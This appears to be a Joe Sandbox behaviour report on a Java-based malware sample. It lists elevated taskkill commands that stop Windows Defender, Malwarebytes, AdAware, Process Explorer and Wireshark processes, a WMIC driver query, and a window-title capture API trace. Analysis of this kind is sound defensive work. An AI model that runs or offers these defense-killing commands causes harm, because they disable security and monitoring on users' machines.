                                                                                                                                                                                                                                  Start time:07:02:13
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                  Start time:07:02:14
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MsMpEng.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                  Start time:07:02:14
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                  Start time:07:02:15
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MpUXSrv.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                  Start time:07:02:15
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MpCmdRun.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
                                                                                                                                                                                                                                  Imagebase:0xf90000
                                                                                                                                                                                                                                  File size:427'008 bytes
                                                                                                                                                                                                                                  MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                  Start time:07:02:17
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM NisSrv.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                  Start time:07:02:17
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                  Start time:07:02:18
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM ConfigSecurityPolicy.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                  Start time:07:02:18
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:07:02:19
Start date:17/04/2024
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:taskkill /IM procexp.exe /T /F
Imagebase:0xd0000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:07:02:19
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:07:02:20
Start date:17/04/2024
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:taskkill /IM wireshark.exe /T /F
Imagebase:0xd0000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:07:02:20
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:07:02:21
Start date:17/04/2024
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:taskkill /IM tshark.exe /T /F
Imagebase:0xd0000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:07:02:21
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:07:02:22
Start date:17/04/2024
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:taskkill /IM text2pcap.exe /T /F
Imagebase:0xd0000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:07:02:22
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:07:02:23
Start date:17/04/2024
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:taskkill /IM rawshark.exe /T /F
Imagebase:0xd0000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:07:02:23
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                  Start time:07:02:24
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mergecap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                  Start time:07:02:24
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                  Start time:07:02:25
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM editcap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                  Start time:07:02:25
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                                                  Start time:07:02:26
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM dumpcap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                                                  Start time:07:02:26
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                                                  Start time:07:02:27
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM capinfos.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                                                  Start time:07:02:27
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                                                  Start time:07:02:28
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mbam.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                                                  Start time:07:02:28
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                                                                  Start time:07:02:29
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mbamscheduler.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:76
                                                                                                                                                                                                                                  Start time:07:02:29
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:77
                                                                                                                                                                                                                                  Start time:07:02:30
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mbamservice.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:78
                                                                                                                                                                                                                                  Start time:07:02:30
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                                                                  Start time:07:02:31
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM AdAwareService.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                                                                  Start time:07:02:31
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0de03eb9bd0af22fa68cb9fb6b447051ab43fcc8a79b1455cb439434f9f65280
                                                                                                                                                                                                                                    • Instruction ID: 0b40c2582adfc8c1cd3fb3db2a214cb131eb82d32c263ad1dca5014c67f8d42d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0de03eb9bd0af22fa68cb9fb6b447051ab43fcc8a79b1455cb439434f9f65280
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1481CB71A04641DFDB98CF20C494BA9F7B2FF49304F0A819DCA5A4B381DB34AC45CBA9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 72eb23a4cca4d7ff7265445af90e4003f28603f0ab4eb6095204e23820149b54
                                                                                                                                                                                                                                    • Instruction ID: a823d9013561a01ef39416823d25861515433a39870040417827f378f40cc152
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72eb23a4cca4d7ff7265445af90e4003f28603f0ab4eb6095204e23820149b54
                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                                                                                                                    Total number of Nodes:695
                                                                                                                                                                                                                                    Total number of Limit Nodes:3

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 73A911C4
                                                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 73A911EB
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 73A911F8
                                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,00000000,-00000002), ref: 73A91208
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A91233
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
• Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
